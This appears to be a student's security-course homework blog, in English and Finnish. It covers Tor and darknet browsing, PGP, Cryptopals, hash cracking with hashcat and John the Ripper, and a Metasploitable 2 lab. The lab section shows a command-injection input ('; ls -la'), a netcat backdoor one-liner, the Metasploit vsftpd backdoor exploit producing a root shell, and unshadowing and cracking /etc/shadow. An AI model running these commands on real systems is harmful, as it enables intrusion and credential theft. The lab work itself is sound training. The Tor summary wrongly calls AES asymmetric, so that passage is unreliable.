Homework 4

h4 The Dark Web and the TOR Browser

Task x: Read and summarize: Shavers & Bair 2016: Hiding Behind the Keyboard: The Tor Browser


The Tor Browser is a chapter in “Hiding Behind the Keyboard. Uncovering Covert Communication Methods with Forensic Analysis” written by Brett Shavers and John Bair. The chapter describes the principles of the The Onion Router network and methods of investigating crimes committed using the TOR browser.

TOR browser is a browser based on Mozilla Firefox, which allows users to anonymously use Internet resources. The idea of onion routing is that a request to an Internet resource comes from a client through a chain of relays, also known as a TOR Circuit. There are Entry/Guard, Middle and Exit relays in a TOR Circuit.

Each relay only knows the previous and next traffic recipient, so the middle relay does not know the sender and the final recipient. Internet traffic is encrypted as many times as there are relays in the circuit and only the traffic between the Exit relay and the end resource is not encrypted.

Tor relays are run by volunteers around the world and the IP addresses of the relays can be found on the website of the Tor project Metrics. In addition, there are Bridges whose IP addresses are not published. They can be used in countries where public relays can be blocked by the government, such as China. At the time of writing this article, there were about 7000 Relays and 2000 Bridges around the world.

Installing and using the Tor browser is very simple. It is enough to download the installation package from the page of the Tor project and install it on the local machine. After that, it is enough to use the default browser settings.

The Tor browser does not create artifacts on the local machine, but traces of using the Tor network can be found on the computer. It is more secure to use the TOR browser from an operating system from a USB or DVD media that does not require installation, for example, Tails, which has a pre-installed Tor. Alternatively, you can configure the Linux bootloader (GRUB2) to bypass the operating system and boot from the ISO image. Black Hat also recommends using a good VPN with Tor browser. I downloaded and ran Tails in a VMWare virtual machine from an ISO image.

Since the Tor browser uses the Mozilla Firefox engine, the vulnerabilities in it also extend to the Tor browser. So the FBI was able to reach the distributors of child pornography Freedom Hosting using a vulnerability CVE-2013-1690 in Firefox ESR 17.x before 17.0.7

Hidden services on the tor network are also known as the Dark Web. These services provide email or web hosting services. Unlike conventional Internet resources in the TOR network, hidden services do not use Exit relays, and therefore provide end-to-end encryption of Internet traffic between the user and the hidden service. Hidden services are not indexed by search engines and are therefore almost invisible to the Internet. Hidden services use a top – level domain .onion and have the form juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/i2p/ (AHMIA i2p network search). Many hidden services sell illegal goods such as drugs, weapons, credit card numbers, child porn and much more.

Source: Shavers & Bair 2016: Hiding Behind the Keyboard.

Task a: Install TOR browser and access TOR network (.onion addresses). (Explain in detail how you installed it, and how you got access to TOR).

I am using Kali linux distribution release 2022.1 on the VMWare Workstation 15 Pro hypervisor. I found instructions for installing the TOR browser for Kali linux and installed the TOR Browser using these instructions


$ sudo apt update

$ sudo apt install -y tor torbrowser-launcher


Source: https://www.kali.org/docs/tools/tor/

After that, TOR Browser and TOR Browser Launcher appeared in the main menu as installed programs


Task b: Browse TOR network, find, take screenshots and comment

  • search engine for onion sites
  • marketplace
  • fraud
  • forum

Since hidden services are not indexed by conventional search engines, then to search in the domain .onion need to use special search engines. Unfortunately, hidden services often change URL addresses and even close. Links to search engines can be found on their websites on the clearnet. The stable search engines in the Tor network are AHMIA, TORCH.


There are also lists of links on the Tor network, such as a The Hidden Wiki page and OnionLinks.


In the vastness of the Tor network there are marketplaces where you can buy illegal goods such as drugs, weapons, stolen credit card numbers and much more.


From what I understand, some of them provide escrow payment services. So the buyer can be sure that the seller will not scam him.


One of the most popular types of fraud that I have encountered on the Tor network is carding. Carding is a whole underground industry in which fraud is committed with the victims’ credit cards. In carding, the roles are strictly divided between the participants, someone steals credit card data, someone uses them by buying and ordering goods online, someone sells the goods received in this way for real money. If you are interested in carding and credit card security, read my article.


There are communication forums on the hidden services of the Tor network. Many of them require registration to access them, which I don’t want to do. Therefore, I found one forum in which registration is not needed to read the messages, and it also turned out to be on the topic of carding.


While I was studying the possibilities of the Tor network, I noticed that the Tor makes it possible to circumvent the prohibitions on viewing Internet resources in a particular country. For example, at the time of writing this article, many Russian resources are blocked for viewing on the territory of the European Union and in particular Finland. Using some Tor circuits you with an exit node in a country where there is no ban, makes it possible to view these resources. For example, the website of the news agency Russia Today is blocked for viewing in Finland, but it can be viewed on the Tor network.


If take a look at circuit, there can see all the relays. Guard or Entry relay in the Netherlands, Middle relay in France and Exit relay in Germany, where from rt.com site is not blocked.


Task c: Find an example where anonymity of TOR user was compromized. How was it done? Who did it? Could the deanonymization be replicated?

One example where anonymity has been compromised is the FBI’s operation to infect Freedom House servers with an exploit that exploited a vulnerability CVE-2013-1690 in Mozilla, on which the Tor browser is built. FBI agents managed to configure the site server so that it infects users’ computers, where malicious code was run and searched for the victim’s MAC address and hostname and sent them back as an HTTP web request to the FBI server.

I believe that at the moment this particular vulnerability cannot be repeated with the new version of the Tor browser, where this vulnerability has been eliminated. However, vulnerabilities in programs are constantly being found, and I do not exclude the possibility of using other vulnerabilities for deanonymization of Tor network users.






Task d: What other pseudonymous/anonymous networks are there? What’s their killer feature? How are they different from TOR?

Other anonymous networks are I2P(Invisible Internet Project) and Freenet.


As stated on the I2P website it is a fully encrypted private network layer that has been developed with privacy and security by design in order to provide protection for activity, location and identity. I2P uses encryption to form various properties of the tunnels used and the messages supported over them. I2P tunnels use NTCP2 and SSU transports. The network is made up of peers (“routers”) and unidirectional inbound and outbound virtual tunnels. The software provides a router that connects to the network. Routers communicate with each other using protocols built on existing transport mechanisms (TCP, UDP, etc), passing messages. I2P provides its own unique DNS. The I2P network is almost completely decentralized, with the exception of the so-called Reseed servers, through which you first join the network.

Comparisons of I2P and Tor can be found on the project’s website. Here are some advantages of I2P:

  • Hidden services are much faster than in Tor
  • Fully distributed and self organizing
  • Peers are selected by continuously profiling and ranking performance, rather than trusting claimed capacity
  • Peer-to-peer friendly
  • Packet switched instead of circuit switched
  • Both TCP and UDP transports
  • Java, not C


Freenet is a peer-to-peer network designed for decentralized distributed storage of data without the possibility of censorship, created to provide users with electronic freedom of speech by making it impossible to delete or block files.

Freenet can be thought of as a large storage device. When you save a file in it, you get a key that you can use to retrieve the file. When you insert a key into Freenet, it will return the corresponding file (if it is on the system). Storage space is shared among all connected nodes in Freenet.

Freenet is a peer-to-peer network that is decentralized and anonymous. The nodes you connect to know only their nearest neighbors and do not know how the network as a whole works.







Task e: In your own words, how does anonymity work in TOR? (e.g. how does it use: public keys, encryption, what algorithms?)

Communication between relays in circuit occurs using AES, asymmetric key cryptography. The key is agreed using Diffie-Hellman. The user encrypts Internet traffic using the keys received from all relays in the circuit. It turns out an onion from layers of encryption, where each layer can only open the next relay in the circuit. Upon receiving the message, the relay decrypts its layer and forwards the message to the next relay. Thus, the request reaches the existential encrypted. The information is encrypted back by each relay and the user receives back the onion, which he encrypts.

Private and public keys, asymmetric encryption are used to publish hidden services. You can read more about it here.



How Does Tor Really Work? The Definitive Visual Guide (2020)

How do onion addresses exactly work?

Task f: What kind of the threat models could TOR fit?

There is an attack in which the attacker tries to control both ends of the chain, called the Sylbil Attack. Named after the main character in Flora Rheta Schreiber’s book Sybil. Sybil attacks are not theoretical. In 2014 researchers at Carnegie Mellon University appeared to successfully carry out a Sybil Attack against the real-life Tor network.

Jansen and others. described an attack in which they DDOS out of the nodes. By degrading the network (removing exit nodes), the attacker increases the chance of getting an exit node.

Some applications, under Tor, reveal your true IP address. One such application is BitTorrent.

Usually, most Tor users get caught in crimes because of insufficient OpSec, and not because of security problems with Tor.


Source: https://skerritt.blog/how-does-tor-really-work/#attacks-on-tor-


Homework 3

h3 Public key encryption and PGP

Task a: Read and summarize (with 1-5 bullet points for each heading)

Schneier 2015: Applied Cryptography Chapter 1: Foundations


  • “A cryptographic algorithm, also called a cipher, is the mathematical function used for encryption and decryption. (Generally, there are two related functions: one for encryption and the other for decryption.)” (Schneier 2015)
  • The difference between symmetric and asymmetric encryption is that symmetric encryption uses the same key for both encryption and decryption, while asymmetric encryption uses two different keys for both procedures.

  • “Cryptanalysis is the science of recovering the plaintext of a message without access to the key. Successful cryptanalysis may recover the plaintext or the key.” (Schneier 2015) “An attempted cryptanalysis is called an attack.” (Schneier 2015)
  • A closed encryption algorithm is not a guarantee that it is reliable. The best encryption algorithms we have are the ones that have been made public, because they have been attacked by the world’s best cryptographers for years, and are still unbreakable.
  • “An algorithm is unconditionally secure if, no matter how much ciphertext a cryptanalyst has, there is not enough information to recover the plaintext.” (Schneier 2015)
  • “Pronouncing an algorithm secure simply because it is infeasible to break, given current technology, is dicey at best. Good cryptosystems are designed to be infeasible to break with the computing power that is expected to evolve many years in the future.” (Schneier 2015)


  • “Steganography serves to hide secret messages in other messages, such that the secret’s very existence is concealed. Generally the sender writes an innocuous message and then conceals a secret message on the same piece of paper.” (Schneier 2015)


  • “Different cryptographic algorithms either substituted characters for one another or transposed characters with one another. The better algorithms did both, many times each.” (Schneier 2015)
  • “These days in computer era, algorithms work on bits instead of characters. This is actually just a change in the alphabet size: from 26 elements to two elements. Most good cryptographic algorithms still combine elements of substitution and transposition.” (Schneier 2015)
  • “A substitution cipher is one in which each character in the plaintext is substituted for another character in the ciphertext. The receiver inverts the substitution on the ciphertext to recover the plaintext.” (Schneier 2015)
  • “In a transposition cipher the plaintext remains the same, but the order of characters is shuffled around.”  (Schneier 2015)


  • “XOR is exclusive-or operation: ‘^’ in C or ⊕ in mathematical notation. It’s a standard operation on bits:
    • 0 ⊕ 0 = 0
    • 0 ⊕ 1 = 1
    • 1 ⊕ 0 = 1
    • 1 ⊕ 1 = 0    ” (Schneier 2015)
  • “XOR is a symmetric algorithm. The plaintext is being XORed with a keyword to generate the ciphertext. Since XORing the same value twice restores the original, encryption and decryption use exactly the same program:Р ⊕ К = С
    С ⊕ К = Р ” (Schneier 2015)
  • Simple XOR is a very low security encryption method.


  • “In one-time pad each key letter is used exactly once, for only one message. The sender encrypts the message and then destroys the used pages of the pad or used section of the tape. The receiver has an identical pad and uses each key on the pad, in turn, to decrypt each letter of the ciphertext.” (Schneier 2015)
  • “Since every plaintext message is equally possible, there is no way for the cryptanalyst to determine which plaintext message is the correct one. A random key sequence added to a nonrandom plaintext message produces a completely random ciphertext message and no amount of computing power can change that.” (Schneier 2015)
  • “Key letters in one-time pad have to be generated randomly. Any attacks against this scheme will be against the method used to generate the key letters.” (Schneier 2015)
  • “Messages encrypted using one-time pads are still secure today and will remain that way forever. It doesn’t matter how long the supercomputers work on the problem.” (Schneier 2015)


  • Three of the most common cryptographic algorithms are:
    • DES (Data Encryption Standard)
    • RSA (named for its creators—Rivest, Shamir, and Adleman)
    • DSA (Digital Signature Algorithm, used as part of the Digital Signature Standard)




Bruce Schneier 2015: Applied Cryptography: Protocols, Algorithms and Source Code in C


Task b: Give two examples of public key cryptography (other than PGP). Explain how public keys are used here.

Public key cryptography serves both to authenticate a message and to ensure its confidentiality. How does it work? Well, the most commonly used use case for public key cryptography is network traffic using the HTTPS protocol encrypted with an SSL/TLS certificate.


The SSL certificate contains a public key that a browser downloads automatically when a user visits a website that uses the HTTPS protocol. Once the certificate is obtained, all traffic between the browser and the website will be encrypted using the public key from that website’s SSL certificate. The key pair is created by the owner of the website, and only the owner of the private key can decrypt the message encrypted with the public key.


But how can we be sure that the site certificate is a real certificate published by the site owner? Well, for this we can ask someone whom everyone trusts to certify the authenticity of the certificate of their digital signature. In a digital signature, asymmetric encryption works differently. A message, or in this case a certificate, signed with the Certificate Authority’s private key can be verified by anyone who knows the public key of the CA. The most commonly used root CA certificates end up in a web browser when you install or update your browser.


A certificate can be signed with multiple digital signatures. In this chain, the trusted issuer CA is always at the root level of the chain. For example, the Google.com website is digitally signed with a GTS CA 1C3 certificate signed by a GTS Root R1 certificate signed by the trusted provider GlobalSign Root CA – R1. All certificates in this chain are valid, so we can be sure that encrypted traffic sent to Google.com will only be decrypted by the owner of Google.com’s private key.



Task c: Encrypt and sign a message. Then decrypt and verify it. Use PGP to encrypt and sign messages.

I am using Kali linux distribution on the VMWare Workstation 15 Pro hypervisor. PGP comes pre-installed with Kali Linux, so I needed to read the pgp help to learn the command syntax.

$ gpg –help
gpg (GnuPG) 2.2.27
libgcrypt 1.9.4
Copyright (C) 2021 Free Software Foundation, Inc.
License GNU GPL-3.0-or-later <https://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: /home/kali/.gnupg
Supported algorithms:
Hash: SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2

Syntax: gpg [options] [files]
Sign, check, encrypt or decrypt
Default operation depends on the input data



In order to encrypt something, I needed to first generate a key pair using gpg command with option –gen-key . The wizard asked for my real name and email address.

$ gpg –gen-key
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Note: Use “gpg –full-generate-key” for a full featured key generation dialog.

GnuPG needs to construct a user ID to identify your key.

Real name: Aleksandr Pantsesnyi
You selected this USER-ID:
“Aleksandr Pantsesnyi <aleksandr.pantsesnyi@myy.haaga-helia.fi>”

Change (N)ame, (E)mail, or (O)kay/(Q)uit? o
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.

Then I had to enter a passphrase.

I listed all existing keys using gpg –list-keys command

I created a test file using the nano editor

$ nano test-file.txt

After typing some text in the editor, I saved it with the Ctrl+X hotkeys, confirmed that I’m sure using the letter Y, and enter. After that, using the cat command, I checked the contents of the file.


I then encrypted the test file using the -r (recipient) option and the –encrypt option with the filename. GPG has created a new file with a .gpg extension at the end of the name. This is an encrypted file whose content is encrypted and cannot be read by a human in the cat command.


I then decrypted the encrypted file using gpg with the -d option and the filename. GPG asked me to enter the passphrase for the private key, after which the text of the file appeared on the screen in text format.


I signed the file using gpg with the –sign option and the filename. GPG created a new .gpg file that looked larger than just the encrypted file.

I checked the size of both files using the du command with the -b (bytes) flag. Adding the signature increased the file size by several hundred bytes.


Using gpg with the –verify option and a filename, I got the file is really signed by me today using an RSA key, and the signature is good.


In the case of asymmetric encryption and digital signature, the same pair of public and private keys was used. In the case of encryption, it was done with a public key and decryption with a private key. In the case of a signature, a private key was used and the authenticity of the signature was verified with a public key.


Source: https://linuxhint.com/encrypt-decrypt-with-pgp/


Task f: Voluntary, programmers only: Cryptopals. Solve Set 1: Challenges 1-3. I highly recommend Cryptopals for learning to break cryptography.

Challenge 1: Convert hex to base64

I chose the Python language and Jupyter notebooks. After some googling, I figured out that I need to use the base64 library to accomplish this task. Using the b64encode method, I encoded and decoded a bytes string extracted from the HEX string. Then, using the b64decode method, I decoded the result back into a HEX string and compared that the decoded result equals the original HEX string.

Challenge 2: Fixed XOR

So, I had to write a simple function using Python language and Jupyter notebook. The function takes two arguments and returns the result as a byte string. Because the function must take two buffers of the same length, I added an assertion to compare the string lengths. Then, using a for loop, the function goes through each pair of bytes from both inputs and XORs that pair. The result of each XOR will be added to the result array using the append function.

Because the input strings are in the form of a HEX string, I had to first convert them to a byte type. I then called the function and gave the input strings as arguments. The result is printed as byte string and as HEX string also.

Challenge 3: Single-byte XOR cipher

In this task, I needed to find one character with a length of one byte. This means that I had to create a FOR loop in which I would iterate over all 256 options that can take a byte. On each iteration, I XORed the input string by byte value. So, I had 256 output options, from which I had to extract the best option in human-readable English. Typically, text is written using mostly lowercase letters and spaces between words. So the range of lowercase ASCII letters is 97-122, and the space character is 32. I created a list with all of these values, and on each iteration I compared the results for the highest match against the values in that list. The function returns a list of results that contains three values: the best match key, the most English letters, and the best match plain text.

I then passed a HEX encoded string to the variable and called a function that passed that variable as an argument. The returned result has been printed below.



ASCII table : https://www.cs.cmu.edu/~pattis/15-1XX/common/handouts/ascii.html

Homework 2

h2 hashes

Read and summarize

Santos et al 2017: Security Penetration Testing – The Art of Hacking Series LiveLessons: Lesson 6: Hacking User Credentials

Password best practices:

  • Strong long passwords
  • Unique password for each system
  • Multi-factor authentication
  • Disable default passwords
  • Using a VPN on Public Networks


How do we do better with passwords:

  • Hashing algorithms are not enough
  • Use salt on your hash
  • Create strong passwords every where
  • Use two factor authentication
  • Use certificate based authentication
  • Better randomness


Brute Force tools


Security Penetration Testing The Art of Hacking Series LiveLessons

By Omar Santos, Jon Sternstein, Ron Taylor, Chris McCoy


I am using Kali linux distribution on the VMWare Workstation 15 Pro hypervisor. Hashcat comes pre-installed with Kali Linux, so I needed to read the hashcat help to learn the command syntax.

$ hashcat –help
hashcat (v6.2.5) starting in help mode

Usage: hashcat [options]… hash|hashfile|hccapxfile [dictionary|mask|directory]…
I tried running hashcat in Benchmarking mode using the -b option. This failed due to insufficient memory allocated to the virtual machine.

After I allocated 8 GB of RAM to the virtual machine, hashcat started working in Benchmarking mode. But the speed was low, and I decided to increase the number of dedicated processor cores for the virtual machine. After that hashcat Benchmarking test was done in 2 minutes.


Crack the hash

The first task is to crack hash: 21232f297a57a5a743894a0e4a801fc3

So, I had to specify the hash type for hashcat. Using the Hash Analyzer service, I got that the type of this hash is MD5 or MD4. The hash type will be 0 or 900. First I will try MD5 using the -m 0 option.

Hash Aalyzer service: https://www.tunnelsup.com/hash-analyzer/


Because I was trying to crack one hash, I added it to the command as is, without putting it in a file first.

$ hashcat -m 0 -a 0 -o hashcat-output.txt 21232f297a57a5a743894a0e4a801fc3 /usr/share/wordlists/rockyou.txt



I knew that the password length is 5 symbols. I tried to crack it using mask option -a 3 and mask ?1?1?1?1?1

$ hashcat -m 0 -a 3 –show 21232f297a57a5a743894a0e4a801fc3 ?1?1?1?1?1


But what if the length of the password is unknown? In this case, you can use a length range and the -i increment option with minimum and maximum values.

$ hashcat -m 0 -a 3 –show -i –increment-min=3 –increment-max=10 21232f297a57a5a743894a0e4a801fc3


Crack Windows NTLM hash

Next task is to Crack this Windows NTLM hash: f2477a144dff4f216ab81f2ac3e3207d

I used password dictionary and output file windows-hash.txt

$ hashcat -m 1000 -a 0 -o windows-hash.txt f2477a144dff4f216ab81f2ac3e3207d /usr/share/wordlists/rockyou.txt

$ cat windows-hash.txt


I tried to use mask with increment option

$ hashcat -m 1000 -a 3 –show -i –increment-min=3 –increment-max=10 f2477a144dff4f216ab81f2ac3e3207d


Try cracking this hash and comment on your hash rate

Try cracking this hash and comment on your hash rate $2y$18$axMtQ4N8j/NQVItQJed9uORfsUK667RAWfycwFMtDBD6zAo1Se2eu (Update: Crack this -> Try cracking this. I’m interested in your comments on the hash rate, no need to get the password).

Well, for that, I needed to understand what hash rate means. I found the definition of the term:

“Hashrate is a measure of the computational power per second used when mining. More simply, it is the speed of mining. It is measured in units of hash/second, meaning how many calculations per second can be performed.”

Source: https://bitflyer.com/en-us/s/glossary/hashrate

Hash Analyzer gave me an example of hashes. It looked like a BCRYPT hash

I had added hash to the file bcrypt.txt and checked it using hashid tool

$ hashid -m bcypt.txt
–File ‘bcypt.txt’–
Analyzing ‘$2y$18$axMtQ4N8j/NQVItQJed9uORfsUK667RAWfycwFMtDBD6zAo1Se2eu’
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x
[+] bcrypt [Hashcat Mode: 3200]
–End of file ‘bcypt.txt’–

I had to use hash mode 3200

$ hashcat -m 3200 -a 3 -w 3 bcypt.txt

I guess hashrate is speed. Because I was using a VMWare virtual machine, I couldn’t use the GPU to crack the hashes. As a result, we see that there is speed for only one device. The allocated processor power of the virtual machine will not be enough for bitcoin mining.

Speed.#1………: 0 H/s (41.96ms) @ Accel:4 Loops:512 Thr:1 Vec:1


The Top tool showed that when the BCRYPT hash was cracked, the CPU usage was almost 400%, which means that almost all the power of four cores was used.


Also, the CPU usage of the Windows host machine was quite high.


John the Ripper

I tried to use the John the Ripper tool that comes preinstalled with the Kali linux distribution to crack passwords on local machines from the /etc/passwd and /etc/shadow files. I once did this in my homework for a penetration testing course, but here in Kali linux it didn’t work.

First I needed to unshadow the /etc/passwd and /etc/shadow files and redirect the output to a file.

$ sudo unshadow /etc/passwd /etc/shadow > shadow


Then, using john tool, I needed to crack passwords in an unshadowed file. But I always had the same error.

$ john –wordlist=/usr/share/wordlists/rockyou.txt  unshadowed
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

After some research and googling, I found that I need to use the –format=crypt option. It worked. Kali linux distribution has only one “kali” user by default and his “kali” password was cracked using John the Ripper tool.









Tehtävä 2

h2 turbo boosted

OWASP A03:2021 – Injection

An application is vulnerable to attack when:

  • User-supplied data is not validated, filtered, or sanitized by the application.
  • Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.
  • Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.
  • Hostile data is directly used or concatenated. The SQL or command contains the structure and malicious data in dynamic queries, commands, or stored procedures.

Lähde: OWASP A03:2021 – Injection

Primary Defenses:

  • Option 1: Use of Prepared Statements (with Parameterized Queries)
  • Option 2: Use of Stored Procedures
  • Option 3: Allow-list Input Validation
  • Option 4: Escaping All User Supplied Input

Additional Defenses:

  • Also: Enforcing Least Privilege
  • Also: Performing Allow-list Input Validation as a Secondary Defense

Lähde: OWASP SQL Injection Prevention Cheat Sheet


WebGoat SQLi

Metasploitable 2

Latasin Metasploitable 2 tästä lähteestä:

Se tuli VMWare koneena, joten minun ei tarvinnut tehdä mitään muuta kuin purkkaa arkiston ja avata koneen VMWare Workstation 15 Pro hypervisorissa.

Käynnistin virtuaalikoneen jossa on asennettu Kali linux samassa verkossa Metaspoitable 2 kanssa. Kali linux koneelta tulen tekemään lähiverkon porttiskannausta. Kaikki alla mainitut komennot suoritetaan Kali linux koneelta, johon olin kirjautuneena SSH-yhteydellä isäntäkoneelta (Windows 10) MobaXterm ohjelmaa käyttäen. Ennen tehtävän aloittamista otin Metaspoiltable 2 ja Kali koneet pois NAT:sta, jotta ne eivät näkyisi virtuaaliverkon ulkopuolelle ja muut verkot ei tulisi skannatuksi vahingossa.

Katsotaan ensin nmap skannerin ohjeet:
$ nmap -h

Löysin sopivan parametrin joka skannaa vain IP-osoitteet lähiverkossa

-sn: Ping Scan – disable port scan

Käynnistin shellin lokitus komennolla:
$ script -fa nmap.log

Katsotaan koneen verkkoasetukset:
$ ifconfig -a

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet netmask broadcast
inet6 fe80::20c:29ff:fe07:c6c0 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:07:c6:c0 txqueuelen 1000 (Ethernet)
RX packets 1077 bytes 96803 (94.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1243 bytes 134456 (131.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet netmask
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 545 bytes 47884 (46.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 545 bytes 47884 (46.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


IP-osoite kuuluu verkkoon, jonka maski on 24 bit
Käynnistetään verkon skannaus ilman porttiskannausta:

$ nmap -v -sn


Nmap scan report for [host down]
Nmap scan report for [host down]
Nmap scan report for
Host is up (0.00075s latency).
Nmap scan report for [host down]

Nmap scan report for [host down]
Nmap scan report for
Host is up (0.0030s latency).
Nmap scan report for
Host is up (0.0026s latency).
Nmap scan report for [host down]
Nmap scan report for [host down]

Lähiverkossa on kolme IP-osoitetta näkyneet skannauksessa. Edellisestä tehtävästä tiedän, että on VMWare virtuaaliverkon DNS (LAN DNS) (Local host) (Kohdekone)

Käynnistetään nmap seuraavilla parametreilla:

-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level (use -vv or more for greater effect)
$ nmap -v -A

Skannattiin 1000 porttia, mitkä ovat well-known ports (0-1023) ja (1024 – 49151 ) Registered ports

Scanning [1000 ports]
Discovered open port 80/tcp on
Discovered open port 3306/tcp on
Discovered open port 111/tcp on
Discovered open port 22/tcp on
Discovered open port 53/tcp on
Discovered open port 139/tcp on
Discovered open port 25/tcp on
Discovered open port 445/tcp on
Discovered open port 23/tcp on
Discovered open port 21/tcp on
Discovered open port 5900/tcp on
Discovered open port 5432/tcp on
Discovered open port 8009/tcp on
Discovered open port 513/tcp on
Discovered open port 6667/tcp on
Discovered open port 1099/tcp on
Discovered open port 514/tcp on
Discovered open port 1524/tcp on
Discovered open port 8180/tcp on
Discovered open port 6000/tcp on
Discovered open port 2121/tcp on
Discovered open port 2049/tcp on
Discovered open port 512/tcp on

Seuraavat palvelut ja protokollat ​​toimivat skannauksen aikana havaitetuissa porteissa:
– NetBIOS Session Service
– Microsoft-DS (Active Directory / SMB)
– Telnet
– Remote Process Execution (512)
– rlogin (513)
– Remote Shell, rsh, remsh, syslog (514)

Kohdekoneelta löytynyt vähintään pari tietokantaa:

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7


nmap skannauksen tuloksesta näkee, että HTTP portti on auki. Sen lisäksi koneella pyörii Apache Tomcat 5.5 portilla 8180 ja Apache JServ Protocol (AJP) portilla 8009. Sille löytyy Ghostcat havoittuvuus ja valmis exploit 

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 – Linux
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

Koneella on asennettu vanha Apache HTTP server vesio 2.2.8. Listan sen haavoittuvuuksista löytyy tästä linkistä:
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-416233/Apache-Http-Server-2.2.8.html Etsimällä voi löytää sopivan exploitin, jolla pääsee hyödyntämään vanhan Apache version havoittuvuudet.

Metasploitable koneella on auki portti 80. Yritin avata Firefox selaimella. Avautunut WEB sovellus. Kirjauduin sinne “admin” käyttäjätunnusta ja “password” salasanaa käyttäen. Vihdoin Security level Low:ksi


Kokeilin ratkaistaa Command Execution tehtävää DVWA sovelluksessa syöttämällä input elementtiin seuraavaa komentoa, jossa puolipisteellä oli erotettu toinen komento joka luettele /root hakemiston sisältöä konsolille.; ls -la /root

Kokeilin vähän vaikeampaa. Syötin komennon joka avaa netcat takaoven portilla 4444; /tmp/pipe;sh /tmp/pipe | nc -l -p 4444 > /tmp/pipe

Metasploitable koneella käynnistyi prosessi, joka jäänyt kuuntelemaan porttia 4444

Kokeilin luoda yhteyden Kali koneelta Metasploitable koneelle netcat ohjelmalla portille 4444. Yhteys muodostui, mutta sitä ei ollut paljon apua.




nmap skannauksen tuloksesta näkee, että FTP on auki ja Anonymous kirjautuminen sallittu

21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| FTP server status:
| Connected to
| Logged in as ftp
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 – secure, fast, stable
|_End of status

Kokeilin kirjautua sinne FTP-yhteydellä

$ ftp anonymous@
Connected to
220 (vsFTPd 2.3.4)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Tuloksessa näkynyt myös vsFTPd 234, löysin netistä metasploit exploitin (vsftpd_234_backdoor) tämän haavoittuvuuden hyväksikäyttöön

Lähde: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/

Kokeilin käyttää sitä. Pakollisena parametrina siinä on RHOST ja RPORT. Portiksi on valmiiksi asetettu 21, joten vaihdoin vain RHOST parametria laitamalla kohdekoneen IP-osoitteen. Exploit loi root shell session kohdekoneelle.

$ msfconsole
> use exploit/unix/ftp/vsftpd_234_backdoor
> show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
—- ————— ——– ———–
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):

Name Current Setting Required Description
—- ————— ——– ———–
Exploit target:

Id Name
— —-
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] – Banner: 220 (vsFTPd 2.3.4)
[*] – USER: 331 Please specify the password.
[+] – Backdoor service has been spawned, handling…
[+] – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened ( -> ) at 2022-04-09 10:53:30 +0300



Back door

Kohdekoneen portilla 1524 oli kanssa palvelu
1524/tcp open bindshell Metasploitable root shell

Kokeilin luoda yhteyttä Netcat ohjelmalla ja pääsin heti root shelliin.

$ nc 1524
root@metasploitable:/# whoami
root@metasploitable:/# pwd

Lähde: https://cyberdewey.blogspot.com/2018/09/metasploitable-2-method-3-bind-shell.html

John the Ripper

Kopioin /etc/shadow ja /etc/passwd tiedostot kohdekoneelta Kali-koneelle kansioon /home/kali/Metasploitable/
John the Ripper käyttää salasanojen sanakirjaa. Käytän kotitehtävässä 1 käytettyä Rockyou.txt salasanojen listaa

root@metasploitable:/# cat /etc/shadow

Kali koneella suoritin seuraavat komennot:

$ unshadow passwd.txt shadow.txt > unshadowed.txt

$ john –wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

